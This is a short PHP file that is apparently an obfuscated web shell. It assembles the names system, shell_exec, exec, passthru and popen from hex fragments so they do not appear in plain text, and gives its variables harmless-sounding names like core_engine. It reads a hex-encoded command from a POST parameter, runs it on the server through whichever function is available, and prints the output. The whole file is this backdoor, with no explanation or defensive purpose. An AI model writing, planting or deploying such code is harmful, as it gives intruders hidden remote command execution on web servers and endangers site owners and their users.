<?php


$obj1 = '3';
$obj2 = '9';
$obj3 = '7';
$obj4 = '4';
$obj5 = '5';
$obj6 = '6';
$obj7 = 'd';
$obj8 = '8';
$obj9 = 'c';
$obj10 = 'f';
$obj11 = '0';
$obj12 = '1';
$obj13 = '2';
$obj14 = 'e';
$core_engine1 = pack("H*", '7' . $obj1 . '7' . $obj2 . $obj3 . $obj1 . $obj3 . $obj4 . '6' . $obj5 . $obj6 . $obj7);
$core_engine2 = pack("H*", $obj3 . '3' . '6' . $obj8 . '6' . '5' . $obj6 . $obj9 . '6' . $obj9 . '5' . $obj10 . $obj6 . $obj5 . '7' . '8' . '6' . '5' . $obj6 . '3');
$core_engine3 = pack("H*", $obj6 . $obj5 . '7' . $obj8 . $obj6 . $obj5 . '6' . $obj1);
$core_engine4 = pack("H*", $obj3 . $obj11 . '6' . $obj12 . '7' . '3' . $obj3 . $obj1 . $obj3 . '4' . $obj6 . $obj8 . $obj3 . $obj13 . '7' . '5');
$core_engine5 = pack("H*", '7' . $obj11 . '6' . $obj10 . $obj3 . $obj11 . '6' . '5' . '6' . 'e');
$core_engine6 = pack("H*", $obj3 . '3' . $obj3 . $obj4 . '7' . '2' . '6' . '5' . '6' . '1' . '6' . 'd' . $obj5 . 'f' . '6' . $obj3 . '6' . $obj5 . $obj3 . '4' . '5' . $obj10 . $obj6 . '3' . $obj6 . $obj10 . $obj6 . 'e' . $obj3 . '4' . '6' . $obj5 . '6' . $obj14 . $obj3 . '4' . '7' . '3');
$core_engine7 = pack("H*", $obj3 . '0' . $obj6 . $obj1 . '6' . 'c' . $obj6 . 'f' . '7' . '3' . $obj6 . $obj5);
$core_engine = pack("H*", '6' . $obj1 . $obj6 . 'f' . $obj3 . '2' . $obj6 . '5' . '5' . 'f' . '6' . '5' . '6' . $obj14 . $obj6 . '7' . $obj6 . $obj2 . '6' . 'e' . '6' . $obj5);
if (isset($_POST[$core_engine])) {
    $core_engine = pack("H*", $_POST[$core_engine]);
    if (function_exists($core_engine1)) {
        $core_engine1($core_engine);
    } elseif (function_exists($core_engine2)) {
        print $core_engine2($core_engine);
    } elseif (function_exists($core_engine3)) {
        $core_engine3($core_engine, $item_marker);
        print join("\n", $item_marker);
    } elseif (function_exists($core_engine4)) {
        $core_engine4($core_engine);
    } elseif (function_exists($core_engine5) && function_exists($core_engine6) && function_exists($core_engine7)) {
        $entry_ptr = $core_engine5($core_engine, 'r');
        if ($entry_ptr) {
            $record_itm = $core_engine6($entry_ptr);
            $core_engine7($entry_ptr);
            print $record_itm;
        }
    }
    exit;
}
